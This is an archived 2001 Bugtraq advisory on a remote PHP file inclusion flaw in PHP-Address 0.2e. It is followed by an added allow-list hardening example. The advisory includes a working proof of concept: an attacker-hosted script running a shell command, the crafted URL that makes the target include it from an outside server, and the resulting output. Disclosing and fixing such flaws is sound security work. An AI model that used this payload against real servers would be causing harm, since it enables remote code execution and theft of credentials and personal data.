[25824] in bugtraq


PHP source injection in PHPAddress

daemon@ATHENA.MIT.EDU (tim vandermeersch)
Mon Jun 17 18:52:32 2002

Message-ID: <00fa01c18dc4$785b99a0$01000001@tim>
From: "tim vandermeersch" <tim.vandermeersch@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Wed, 26 Dec 2001 05:19:11 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

PHP source injection in PHPAddress

Description

PHP-Address is a collection of PHP3 scripts (works on PHP4 too)
for maintaining a small web-based address database. It can be found
at http://phpaddress.huebsch-gemacht.de/

Workaround

Change the global.php3 file so it looks like this:
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch (chu@informatik.tu-chemnitz.de)
$LangCookie = "";      // THIS LINE (added): discards any request-supplied value
if ($LangCookie)
  require("$LangCookie.php3");  // Line 5
...

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests a URL like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
able to include any file he wants.

Example

I put a PHP script on my server which I wanted to include:

------------x.php3------------
<?
    passthru("/bin/ls /");
?>
-------------------------------

Then I requested this URL:
http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is already there; look at line 5 in global.php3)

------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var
------------------------------

Note that any PHP code could be included; malicious users could get access
to database passwords, personal information, ...

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
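
An added example, not part of the original advisory and not PHPAddress code: one way to keep the language include while closing the injection is to match the value against an allow-list instead of building a path from it. The language codes, the lang/ directory, the cookie name and the function name resolve_lang_file are assumptions made for illustration.

```php
<?php
// Added example, not PHPAddress code. The language codes and the directory
// layout below are assumptions made for illustration.

// Allow-list of language codes the application ships (hypothetical values).
$ALLOWED_LANGS = array('en', 'de', 'nl');

/**
 * Return the absolute path of the language file for $requested, or null
 * if the value is not an exact, allow-listed language code.
 */
function resolve_lang_file($requested, $allowed, $baseDir)
{
    // Reject arrays (?LangCookie[]=x) and anything that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    // Strict comparison against known codes: URLs, "../" and NUL bytes
    // can never match, so no path is ever built from unchecked input.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $path = realpath($baseDir . '/' . $requested . '.php3');
    $base = realpath($baseDir);
    // Confirm the file exists and sits directly inside $baseDir
    // (realpath resolves symlinks, so a link pointing elsewhere fails).
    if ($path === false || $base === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Read the value from the cookie only (cookie name assumed), never from a
// register_globals variable that a query string can also populate.
$requested = isset($_COOKIE['LangCookie']) ? $_COOKIE['LangCookie'] : null;
$langFile  = resolve_lang_file($requested, $ALLOWED_LANGS, __DIR__ . '/lang');
if ($langFile !== null) {
    require $langFile;
}
```

In current PHP, allow_url_include is Off by default, which blocks the http:// form of the request shown above; the allow-list is still needed because require continues to accept local paths.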


